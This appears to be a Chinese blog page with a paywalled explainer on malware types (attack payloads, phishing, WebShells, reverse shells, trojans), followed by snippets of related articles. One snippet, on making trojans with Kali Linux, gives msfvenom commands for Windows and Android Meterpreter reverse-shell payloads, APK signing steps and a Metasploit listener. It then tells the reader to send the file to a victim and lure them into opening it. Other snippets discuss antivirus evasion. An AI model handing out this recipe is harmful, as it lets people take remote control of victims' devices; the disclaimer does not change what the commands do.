攻击载荷、木马、蠕虫、感染型病毒,你了解多少?

最新推荐文章于 2025-05-19 08:01:07 发布
原创 最新推荐文章于 2025-05-19 08:01:07 发布 · 1.7k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #服务器 #运维

恶意程序是指数字世界中带有攻击意图的程序实体,通常可以分为攻击载荷、木马、蠕虫、感染型病毒。

1.攻击载荷

攻击载荷是指攻击者发起初始攻击并建立网络连接的武器载体,按照功能可以分为投递攻击类、连接控制类、独立攻击类。

  • 投递攻击类有远程攻击类载荷、钓鱼邮件、恶意文档等。

  • 连接控制类有WebShell、反弹Shell、后门木马(BackDoor)等。

  • 独立攻击类有SSH、RDP、Telnet等标准Shell。

  • 远程攻击类载荷的目标是实施网络远程入侵攻击并获得系统执行命令的权限,大名鼎鼎的“永恒之蓝”漏洞的利用方式就属此类。这类载荷往往体积较小,获得系统权限之后通常仅执行下载等少量操作,如果不需要作为跳板进一步扩大战果,这类载荷一般以内存态呈现。

  • 钓鱼邮件是另一种常见的投递攻击类载荷。最常见的手段是投递一个附件,如果你被诱导打开了附件里的文档或程序,则可能会被种下后门木马。隐蔽一些的手段会结合浏览器漏洞实施攻击,邮件中是一个网址或带链接的图片,如果你的浏览器存在漏洞,有可能在点击链接之后被攻陷。最高级的钓鱼邮件会使用邮箱软件0DAY或系统指针0DAY等“核武器”实施攻击,只要你打开邮件,不需要任何操作,就可能被攻陷。

  • 恶意文档一般伴随着钓鱼攻击出现,除了邮件钓鱼,攻击者逐渐倾向使用聊天工具冒充合作伙伴、招聘HR等角色实施钓鱼攻击,发给你的文档是包含漏洞利用代码的。

  • WebShell是最常见的连接控制类载荷。当攻击完成之后,如果目标是一个Web应用服务器,攻击者会在合适的目录下放置一个实施命令与控制的PHP或J

最低0.47元/天 解锁文章

新学期VIP享超值加赠
《WEB安全渗透测试》(20)payload攻击载荷
午夜安全
08-23 9682
《WEB安全渗透测试》(20)payload攻击载荷 payload称为攻击载荷,主要用于建立目标机与攻击机之间的稳定连接,并返回一个shell,也可以进行程序注入等。(1)singles(独立载荷)独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp。(2)stagers(传输器载荷)传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与stages(传输体载荷)配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后,方便进行注入,这类载荷功能都非常相似...
网络安全-攻击篇-攻击载体
qq_53439698的博客
01-06 2179
随着网络的安全事态不断演变、新的威胁不断出现,从而也萌生了形式多样的网络攻击手段。网络安全攻击是指针对计算机信息系统、基础设施、计算机网络或个人计算机设备的任何类的进攻动作。这些攻击可能会破坏网络系统运行的安全、信息内容的安全、信息通信与传播安全,使计算机或网络系统中的数据被篡改、窃取或丢失,导致严重的安全后果。网络安全攻击通常由黑客或其他恶意行为者发起,他们利用各种技术手段和漏洞来实施攻击,以获得非法利益或造成损害。
理解攻击载荷
热门推荐
小山岷的专栏
01-10 1万+
攻击载荷(payload)是系统被攻陷后执行的操作。通常攻击载荷附加于漏洞攻击模块之上,随漏洞攻击一起分发。攻击载荷主分别为:singles stagers stagessinglesSingles are payloads that are self-contained and completely standalone. A Single payload can be some
白帽子学习——Metasploit渗透测试指南
weixin_43487532的博客
09-12 6463
黑客之渗透初学
网络安全—渗透测试常用名词术语介绍篇】
旺仔Sec&blog
02-18 3775
POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。
【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 9578
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
攻击载荷免杀技术
06-15 433
大多数杀毒软件使用特征码来识别恶意代码。特征码在杀毒引擎中,对磁盘和进程进行扫描匹配。 为了避开杀毒软件,可以针对特征码创建一个独一无二的攻击载荷,它不与杀毒软件的任何特征码匹配。 当直接渗透时,metasploit的攻击载荷可以只在内存中运行,不将任何数据写入到硬盘上,我们发起攻击并上传攻击载荷后,大多数杀毒软件都无法检测出来。 1.使用MSF攻击载荷生成器创建可独立运行的木...
网络安全-攻击篇-攻击载体_基于人的网络安全攻击 csdn
zhuceyigecsdn的博客
04-09 1092
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
《Web安全之深度学习实战》笔记:第十二章 智能扫描器(1) XSS攻击载荷
mooyuan的网络安全博客
03-12 4543
本小节讲述通过webshell载荷的生成。别看本小节的标题较为炫酷,实际上是这就是通过让机器通过学习攻击样本,使用RNN的LSMT算法自动生成XSS攻击载荷
.NET多阶段加载程序攻击Windows系统部署恶意载荷
最新发布
farway000的博客
05-19 47
该加载程序主要传播 AgentTesla、Formbook、Remcos 和 404Keylogger 等常见威胁,2022 年 3 月至 2025 年 2 月的统计分析显示其具有稳定的恶意软件投递模式。自 2022 年初以来,一种复杂的 .NET 多阶段恶意软件加载程序持续针对 Windows 系统发起攻击,成为传播信息窃取程序和远程访问木马等危险载荷的分发渠道。该加载程序采用复杂的三阶段部署机制,在向受感染设备投递恶意软件的同时有效规避检测。恶意加载程序持续演进。
红队免杀培训第二章-使用系统调用http 协议下载恶意载荷
Gamma_lab的博客
03-12 3177
​ 这是红队免杀培训的第二章,后续会继续推出红队免杀培训的一些小tips,等后面把这系列更完了,大家把所有的技术点窜起来一起用,那就是乱杀,上一章说了如何避免申请可执行内存块,执行shellcode,这一章将讲如何使用系统调用下载恶意载荷。 前言: ​ 从杀软的行为分析来看,就拿cs的通信协议来讲,stage 的载荷在行为上是明显比stageless载荷多很多的,其中不免一些通信协议的特征,分析过的都知道,stage只是个前置载荷,后续会下更大的功能更全的载荷,因为之前做免杀卡巴的时候就注意到
病毒(Virus)和蠕虫(Worm)的区别
Sile_Moon的博客
05-15 1058
1. 病毒指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。2. 蠕虫也算是一种计算机病毒,但与病毒不同的是,蠕虫可以进行自我的复制,不像病毒需要依靠被感染的驻留文件去进行复制与传播。另外的病毒感染的目标主要面向计算机中的文件系统文件,而蠕虫则以互联网中的所有计算机为感染对象。
每日一书丨Rootkit和Bootkit:现代恶意软件逆向分析和下一代威胁
Piotr_ce的博客
03-03 2682
网络犯罪集团和恶意行为者将继续编写更加持久和隐蔽的攻击程序,攻防之战远没有结束! 微软Windows操作系统的防御能力演进,使得Rootkit和Bootkit设计的几个主要分支陷入了死胡同。 以BIOS和芯片组固件为攻击目标的新恶意软件出现,这已经超出了当前Windows安全防护软件的能力范围。 越来越多的安全工程师对高级可持续恶意软件威胁如何绕过操作系统级别的安全机制感兴趣。那么,如何发现并逆向、有效分析这些高级威胁? 这里我们介绍一本新书《Rootkit和Bootkit:现代恶意软件逆向分.
蠕虫攻击|worm-type virus(信息总结)
m0_49025459的博客
01-29 2566
蠕虫病毒是一种常见的计算机病毒,是无须计算机使用者干预即可运行的独立程序,它通过不停的获得网络中存在漏洞的计算机上的部分或全部控制权来进行传播。当这些新的被蠕虫入侵的计算机被控制之后,蠕虫会以这些计算机为宿主继续扫描并感染其他计算机,这种行为会一直延续下去。蠕虫病毒传播与一般病毒不同,蠕虫病毒不需要将其自身附着到宿主程序,它是一种独立智能程序。一般有两种类蠕虫:主机蠕虫网络蠕虫
全面解析恶意软件 从rootkit到bootkit
10-27 2028
 作者: Noah Schiffman,  出处:TechTarget,  如今最致命类的恶意代码就是"Rootkit" ,这种恶意可以获得"root"权限,并部署恶意程序的可执行的软件包,Rootkit是如何危害用户的呢……  【IT专家网独家】可以说,如今最复杂,最致命类的恶意代码就是"Rootkit" 。顾名思义,这种恶意可以获得"root"权限,在unix系统中最高
攻击&防御
QuJJan的博客
01-22 1459
引导区病毒是将系统的正常引导信息(原引导区的内容)转移到磁盘中的某个空闲的位置保存起来,用病毒代码代替正常的系统引导信息,这样,主引导区中实际已经不是正常的引导信息,而是病毒代码。当系统启动时,病毒代码先驻留到内存中,当病毒代码驻留内存后,再跳转到保存系统正常引导信息的磁盘扇区去开始执行真正的系统引导程序。例如,攻击者可能利用系统中的漏洞来渗透目标系统,然后通过病毒在系统内部进行传播,并最终引入木马来控制受感染的系统。尽管漏洞、病毒木马是不同的术语,但它们之间可以相互配合,作为攻击过程中的各个环节。
一个感染木马病毒分析(一)
Fly20141201. 的专栏
08-04 7141
一、 样本信息 样本名称:resvr.exe(病毒母体) 样本大小:70144 字节 病毒名称:Trojan.Win32.Crypmodadv.a 样本MD5:5E63F3294520B7C07EB4DA38A2BEA301 样本SHA1: B45BCE0FCE6A0C3BA88A1778FA66A576B7D50895 电脑中了该病毒的典的特
网络常见攻击(知识点总结)
weixin_69884785的博客
04-30 9730
SQL注入漏洞(SQLIniection)是Web开发中最常见的一种安全漏洞。SQL注入漏洞就是通过SQL参数替换形成特殊SQL操作。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。
Kali怎么做木马病毒
05-01
### 使用 Kali Linux 创建木马病毒的方法 #### 法律声明 在任何情况下,创建、分发或使用恶意软件都是违法行为。本回答仅限于教育目的,旨在帮助用户了解网络安全防护机制以及潜在威胁的工作原理。未经授权的攻击行为可能导致严重的法律后果。 --- #### 工具介绍与环境搭建 Kali Linux 是一种专门设计用于渗透测试的安全操作系统,内置了许多强大的工具来模拟网络攻击场景。其中最常用的工具之一是 **Metasploit Framework**,它可以用来生成各种类的 payload(有效载荷),这些 payload 可能被误用为所谓的“木马”。以下是具体方法: 1. **安装 Metasploit** 确保已正确安装 Kali Linux 并更新系统包: ```bash apt update && apt upgrade -y ``` 安装 Metasploit 如果尚未默认存在: ```bash apt install metasploit-framework -y ``` 2. **设置目标平台** 根据目标设备的操作系统选择合适的 payload 类。例如: - Windows: `windows/x64/meterpreter/reverse_tcp` 或者 `windows/meterpreter/reverse_http(s)` - Android: `android/meterpreter/reverse_tcp` - macOS/Linux: `linux/x86/meterpreter/reverse_tcp` 3. **生成 Payload 文件** 使用 `msfvenom` 命令生成所需的可执行文件。以下是一些常见示例: - 针对 Windows 的 EXE 文件: ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=<监听端口> -f exe -o output_file.exe ``` 这里 `<你的IP>` 应替换为你的真实 IP 地址,而 `<监听端口>` 则是你希望使用的通信端口号[^4]。 - 针对 Android 的 APK 文件: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=<监听端口> R > output_file.apk ``` 此外还需要签名 APK 才能在某些版本的 Android 上运行: ```bash keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000 jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore output_file.apk alias_name zipalign -v 4 output_file.apk final_output_file.apk ``` 4. **配置监听器** 启动 Metasploit 控制台并加载相应的 exploit 模块以等待连接: ```bash use exploit/multi/handler set PAYLOAD <所选payload> set LHOST <你的IP> set LPORT <监听端口> exploit ``` 5. **传输与部署** 将生成好的文件通过电子邮件或其他方式发送给受害者,并诱导其打开。一旦成功触发,Meterpreter shell 即会建立回连至攻击者的机器上[^1]。 --- #### 注意事项 - 测试应在受控环境中进行,比如个人拥有的虚拟机或者沙盒实例。 - 对抗措施包括但不限于启用防火墙规则、定期扫描可疑进程和服务、保持防病毒定义最新化等手段。 --- ### 提高安全性建议 为了防止成为此类攻击的目标,请采取如下预防行动: - 不随意点击未知链接或附件; - 更新所有应用程序补丁程序; - 实施严格的访问权限管理策略; ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值